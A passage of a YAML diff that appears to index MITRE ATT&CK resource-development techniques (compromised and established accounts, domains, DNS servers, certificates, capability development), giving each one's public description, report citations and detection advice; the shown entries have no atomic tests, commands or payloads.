+ to compromising accounts, adversaries may conduct Reconnaissance to inform
+ decisions about which accounts to compromise to further their operation.\n\nPersonas
+ may exist on a single site or across multiple sites (ex: Facebook, LinkedIn,
+ Twitter, Google, etc.). Compromised accounts may require additional development,
+ this could include filling out or modifying profile information, further developing
+ social networks, or incorporating photos.\n\nAdversaries may directly leverage
+ compromised email accounts for [Phishing for Information](https://attack.mitre.org/techniques/T1598)
+ or [Phishing](https://attack.mitre.org/techniques/T1566)."
+ name: Compromise Accounts
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1586
+ url: https://attack.mitre.org/techniques/T1586
+ - source_name: AnonHBGary
+ description: 'Bright, P. (2011, February 15). Anonymous speaks: the inside
+ story of the HBGary hack. Retrieved March 9, 2017.'
+ url: https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-22T18:05:46.296Z'
+ created: '2020-10-01T01:17:15.965Z'
+ x_mitre_data_sources:
+ - Social media monitoring
+ x_mitre_platforms:
+ - PRE
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '1.0'
+ x_mitre_detection: |-
+ Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently modified accounts making numerous connection requests to accounts affiliated with your organization.
+
+ Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).
+ atomic_tests: []
+ T1584:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1584
+ url: https://attack.mitre.org/techniques/T1584
+ - url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
+ description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
+ Units. Retrieved July 18, 2016.
+ source_name: Mandiant APT1
+ - source_name: ICANNDomainNameHijacking
+ description: 'ICANN Security and Stability Advisory Committee. (2005, July
+ 12). Domain Name Hijacking: Incidents, Threats, Risks and Remediation. Retrieved
+ March 6, 2017.'
+ url: https://www.icann.org/groups/ssac/documents/sac-007-en
+ - source_name: Talos DNSpionage Nov 2018
+ url: https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html
+ description: Mercer, W., Rascagneres, P. (2018, November 27). DNSpionage Campaign
+ Targets Middle East. Retrieved October 9, 2020.
+ - source_name: FireEye EPS Awakens Part 2
+ description: Winters, R.. (2015, December 20). The EPS Awakens - Part 2. Retrieved
+ January 22, 2016.
+ url: https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html
+ - source_name: NSA NCSC Turla OilRig
+ url: https://media.defense.gov/2019/Oct/18/2002197242/-1/-1/0/NSA_CSA_Turla_20191021%20ver%204%20-%20nsa.gov.pdf
+ description: 'NSA/NCSC. (2019, October 21). Cybersecurity Advisory: Turla
+ Group Exploits Iranian APT To Expand Coverage Of Victims. Retrieved October
+ 16, 2020.'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Compromise Infrastructure
+ description: |-
+ Before compromising a victim, adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.
+
+ Use of compromised infrastructure allows an adversary to stage, launch, and execute an operation. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig)
+ id: attack-pattern--7e3beebd-8bfe-4e7b-a892-e44ab06a75f9
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-22T18:03:23.937Z'
+ created: '2020-10-01T00:36:30.759Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_detection: Much of this activity will take place outside the visibility
+ of the target organization, making detection difficult for defenders. Detection
+ efforts may be focused on related stages of the adversary lifecycle, such
+ as during Command and Control.
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1583.002:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1583.002
+ url: https://attack.mitre.org/techniques/T1583/002
+ - source_name: Unit42 DNS Mar 2019
+ url: https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/
+ description: 'Hinchliffe, A. (2019, March 15). DNS Tunneling: how DNS can
+ be (ab)used by malicious actors. Retrieved October 3, 2020.'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: DNS Server
+ description: |-
+ Before compromising a victim, adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.
+
+ By running their own DNS servers, adversaries can have more control over how they administer server-side DNS C2 traffic ([DNS](https://attack.mitre.org/techniques/T1071/004)). With control over a DNS server, adversaries can configure DNS applications to provide conditional responses to malware and, generally, have more flexibility in the structure of the DNS-based C2 channel.(Citation: Unit42 DNS Mar 2019)
+ id: attack-pattern--197ef1b9-e764-46c3-b96c-23f77985dc81
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-19T00:11:26.376Z'
+ created: '2020-10-01T00:40:45.279Z'
+ x_mitre_detection: Much of this activity will take place outside the visibility
+ of the target organization, making detection of this behavior difficult. Detection
+ efforts may be focused on related stages of the adversary lifecycle, such
+ as during Command and Control.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1584.002:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1584.002
+ url: https://attack.mitre.org/techniques/T1584/002
+ - source_name: Talos DNSpionage Nov 2018
+ url: https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html
+ description: Mercer, W., Rascagneres, P. (2018, November 27). DNSpionage Campaign
+ Targets Middle East. Retrieved October 9, 2020.
+ - source_name: FireEye DNS Hijack 2019
+ url: https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html
+ description: 'Hirani, M., Jones, S., Read, B. (2019, January 10). Global DNS
+ Hijacking Campaign: DNS Record Manipulation at Scale. Retrieved October
+ 9, 2020.'
+ - source_name: CiscoAngler
+ description: 'Nick Biasini. (2015, March 3). Threat Spotlight: Angler Lurking
+ in the Domain Shadows. Retrieved March 6, 2017.'
+ url: https://blogs.cisco.com/security/talos/angler-domain-shadowing
+ - source_name: Proofpoint Domain Shadowing
+ url: https://www.proofpoint.com/us/threat-insight/post/The-Shadow-Knows
+ description: 'Proofpoint Staff. (2015, December 15). The shadow knows: Malvertising
+ campaigns use domain shadowing to pull in Angler EK. Retrieved October 16,
+ 2020.'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ description: |-
+ Before compromising a victim, adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.
+
+ By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing)
+ name: DNS Server
+ id: attack-pattern--c2f59d25-87fe-44aa-8f83-e8e59d077bf5
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-19T01:22:53.922Z'
+ created: '2020-10-01T00:54:30.869Z'
+ x_mitre_detection: Much of this activity will take place outside the visibility
+ of the target organization, making detection of this behavior difficult. Detection
+ efforts may be focused on related stages of the adversary lifecycle, such
+ as during Command and Control.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1587:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1587
+ url: https://attack.mitre.org/techniques/T1587
+ - url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
+ description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
+ Units. Retrieved July 18, 2016.
+ source_name: Mandiant APT1
+ - source_name: Kaspersky Sofacy
+ description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
+ 4). Sofacy APT hits high profile targets with updated toolset. Retrieved
+ December 10, 2015.
+ url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
+ - source_name: Bitdefender StrongPity June 2020
+ url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
+ description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
+ Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
+ - source_name: Talos Promethium June 2020
+ url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
+ description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
+ reach with StrongPity3 APT. Retrieved July 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Develop Capabilities
+ description: |-
+ Before compromising a victim, adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)
+
+ As with legitimate development efforts, different skill sets may be required for developing capabilities. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the capability.
+ id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-22T18:18:08.552Z'
+ created: '2020-10-01T01:30:00.877Z'
+ x_mitre_detection: Much of this activity will take place outside the visibility
+ of the target organization, making detection of this behavior difficult. Detection
+ efforts may be focused on related stages of the adversary lifecycle, such
+ as during Defense Evasion or Command and Control.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1587.003:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1587.003
+ url: https://attack.mitre.org/techniques/T1587/003
+ - source_name: Splunk Kovar Certificates 2017
+ url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+ description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+ Certificates. Retrieved October 16, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Digital Certificates
+ description: |-
+ Before compromising a victim, adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).
+
+ Adversaries may create self-signed SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Man-in-the-Middle](https://attack.mitre.org/techniques/T1557) if added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)).
+ id: attack-pattern--1cec9319-743b-4840-bb65-431547bce82a
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-22T18:18:08.422Z'
+ created: '2020-10-01T01:42:24.974Z'
+ x_mitre_data_sources:
+ - SSL/TLS certificates
+ x_mitre_detection: |-
+ Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)
+
+ Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1588.004:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1588.004
+ url: https://attack.mitre.org/techniques/T1588/004
+ - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+ Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+ source_name: DiginotarCompromise
+ url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+ - source_name: Let's Encrypt FAQ
+ url: https://letsencrypt.org/docs/faq/
+ description: Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved
+ October 15, 2020.
+ - source_name: Splunk Kovar Certificates 2017
+ url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+ description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+ Certificates. Retrieved October 16, 2020.
+ - source_name: Recorded Future Beacon Certificates
+ url: https://www.recordedfuture.com/cobalt-strike-servers/
+ description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+ Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Digital Certificates
+ description: |-
+ Before compromising a victim, adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.
+
+ Adversaries may purchase or steal SSL/TLS certificates to further their operations, such as encrypting C2 traffic (ex: [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Man-in-the-Middle](https://attack.mitre.org/techniques/T1557) if the certificate is trusted or otherwise added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)). The purchase of digital certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal certificate materials directly from a compromised third-party, including from certificate authorities.(Citation: DiginotarCompromise)
+
+ Certificate authorities exist that allow adversaries to acquire SSL/TLS certificates, such as domain validation certificates, for free.(Citation: Let's Encrypt FAQ)
+
+ Adversaries may register or hijack domains that they will later purchase an SSL/TLS certificate for.
+ id: attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-22T18:18:54.959Z'
+ created: '2020-10-01T02:14:18.044Z'
+ x_mitre_data_sources:
+ - SSL/TLS certificates
+ x_mitre_detection: |-
+ Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
+
+ Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1583.001:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1583.001
+ url: https://attack.mitre.org/techniques/T1583/001
+ - external_id: CAPEC-630
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/630.html
+ - source_name: CISA MSS Sep 2020
+ url: https://us-cert.cisa.gov/ncas/alerts/aa20-258a
+ description: 'CISA. (2020, September 14). Alert (AA20-258A): Chinese Ministry
+ of State Security-Affiliated Cyber Threat Actor Activity. Retrieved October
+ 1, 2020.'
+ - source_name: FireEye APT28
+ description: 'FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE
+ OPERATIONS?. Retrieved August 19, 2015.'
+ url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
+ - source_name: PaypalScam
+ description: Bob Sullivan. (2000, July 24). PayPal alert! Beware the 'PaypaI'
+ scam. Retrieved March 2, 2017.
+ url: https://www.zdnet.com/article/paypal-alert-beware-the-paypai-scam-5000109103/
+ - source_name: CISA IDN ST05-016
+ url: https://us-cert.cisa.gov/ncas/tips/ST05-016
+ description: 'CISA. (2019, September 27). Security Tip (ST05-016): Understanding
+ Internationalized Domain Names. Retrieved October 20, 2020.'
+ - url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
+ description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
+ Units. Retrieved July 18, 2016.
+ source_name: Mandiant APT1
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Domains
+ description: |-
+ Before compromising a victim, adversaries may purchase domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.
+
+ Adversaries can use purchased domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries can also use internationalized domain names (IDNs) to create visually similar lookalike domains for use in operations.(Citation: CISA IDN ST05-016)
+
+ Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)
+ id: attack-pattern--40f5caa0-4cb7-4117-89fc-d421bb493df3
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-20T20:25:29.310Z'
+ created: '2020-09-30T17:09:31.878Z'
+ x_mitre_contributors:
+ - Wes Hurd
+ - Vinayak Wadhwa, Lucideus
+ - Deloitte Threat Library Team
+ x_mitre_data_sources:
+ - Domain registration
+ x_mitre_detection: |-
+ Domain registration information is, by design, captured in public registration logs. Consider use of services that may aid in tracking of newly acquired domains, such as WHOIS databases and/or passive DNS. In some cases it may be possible to pivot on known pieces of domain registration information to uncover other infrastructure purchased by the adversary. Consider monitoring for domains created with a similar structure to your own, including under a different TLD. Though various tools and services exist to track, query, and monitor domain name registration information, tracking across multiple DNS infrastructures can require multiple tools/services or more advanced analytics.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access and Command and Control.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1584.001:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1584.001
+ url: https://attack.mitre.org/techniques/T1584/001
+ - source_name: ICANNDomainNameHijacking
+ description: 'ICANN Security and Stability Advisory Committee. (2005, July
+ 12). Domain Name Hijacking: Incidents, Threats, Risks and Remediation. Retrieved
+ March 6, 2017.'
+ url: https://www.icann.org/groups/ssac/documents/sac-007-en
+ - source_name: Microsoft Sub Takeover 2020
+ url: https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover
+ description: Microsoft. (2020, September 29). Prevent dangling DNS entries
+ and avoid subdomain takeover. Retrieved October 12, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Domains
+ description: |-
+ Before compromising a victim, adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) An adversary may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.
+
+ Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)
+ id: attack-pattern--f9cc4d06-775f-4ee1-b401-4e2cc0da30ba
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-19T01:28:56.664Z'
+ created: '2020-10-01T00:51:28.513Z'
+ x_mitre_detection: Much of this activity will take place outside the visibility
+ of the target organization, making detection of this behavior difficult. Detection
+ efforts may be focused on related stages of the adversary lifecycle, such
+ as during Command and Control.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1585.002:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1585.002
+ url: https://attack.mitre.org/techniques/T1585/002
+ - url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
+ description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
+ Units. Retrieved July 18, 2016.
+ source_name: Mandiant APT1
+ - source_name: Trend Micro R980 2016
+ url: https://blog.trendmicro.com/trendlabs-security-intelligence/r980-ransomware-disposable-email-service/
+ description: Antazo, F. and Yambao, M. (2016, August 10). R980 Ransomware
+ Found Abusing Disposable Email Address Service. Retrieved October 13, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Email Accounts
+ description: |-
+ Before compromising a victim, adversaries may create email accounts that can be used during targeting. Adversaries can use accounts created with email providers to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1) Adversaries may also take steps to cultivate a persona around the email account, such as through use of [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001), to increase the chance of success of follow-on behaviors. Created email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).(Citation: Mandiant APT1)
+
+ To decrease the chance of physically tying back operations to themselves, adversaries may make use of disposable email services.(Citation: Trend Micro R980 2016)
+ id: attack-pattern--65013dd2-bc61-43e3-afb5-a14c4fa7437a
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-14T00:48:47.515Z'
+ created: '2020-10-01T01:09:53.217Z'
+ x_mitre_detection: 'Much of this activity will take place outside the visibility
+ of the target organization, making detection of this behavior difficult. Detection
+ efforts may be focused on related stages of the adversary lifecycle, such
+ as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1586.002:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1586.002
+ url: https://attack.mitre.org/techniques/T1586/002
+ - source_name: AnonHBGary
+ description: 'Bright, P. (2011, February 15). Anonymous speaks: the inside
+ story of the HBGary hack. Retrieved March 9, 2017.'
+ url: https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Email Accounts
+ description: |-
+ Before compromising a victim, adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566). Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).
+
+ A variety of methods exist for compromising email accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising email accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.
+
+ Adversaries can use a compromised email account to hijack existing email threads with targets of interest.
+ id: attack-pattern--3dc8c101-d4db-4f4d-8150-1b5a76ca5f1b
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-20T16:40:58.761Z'
+ created: '2020-10-01T01:20:53.104Z'
+ x_mitre_detection: 'Much of this activity will take place outside the visibility
+ of the target organization, making detection of this behavior difficult. Detection
+ efforts may be focused on related stages of the adversary lifecycle, such
+ as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1585:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1585
+ url: https://attack.mitre.org/techniques/T1585
+ - source_name: NEWSCASTER2014
+ description: Lennon, M. (2014, May 29). Iranian Hackers Targeted US Officials
+ in Elaborate Social Media Attack Operation. Retrieved March 1, 2017.
+ url: https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation
+ - source_name: BlackHatRobinSage
+ description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
+ March 6, 2017.
+ url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
+ - url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
+ description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
+ Units. Retrieved July 18, 2016.
+ source_name: Mandiant APT1
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Establish Accounts
+ description: |-
+ Before compromising a victim, adversaries may create and cultivate accounts with services that can be used during targeting. Adversaries can create accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)
+
+ For operations incorporating social engineering, the utilization of an online persona may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Establishing a persona may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)
+
+ Establishing accounts can also include the creation of accounts with email providers, which may be directly leveraged for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1)
+ id: attack-pattern--cdfc5f0a-9bb9-4352-b896-553cfa2d8fd8
+ type: attack-pattern
+ kill_chain_phases:
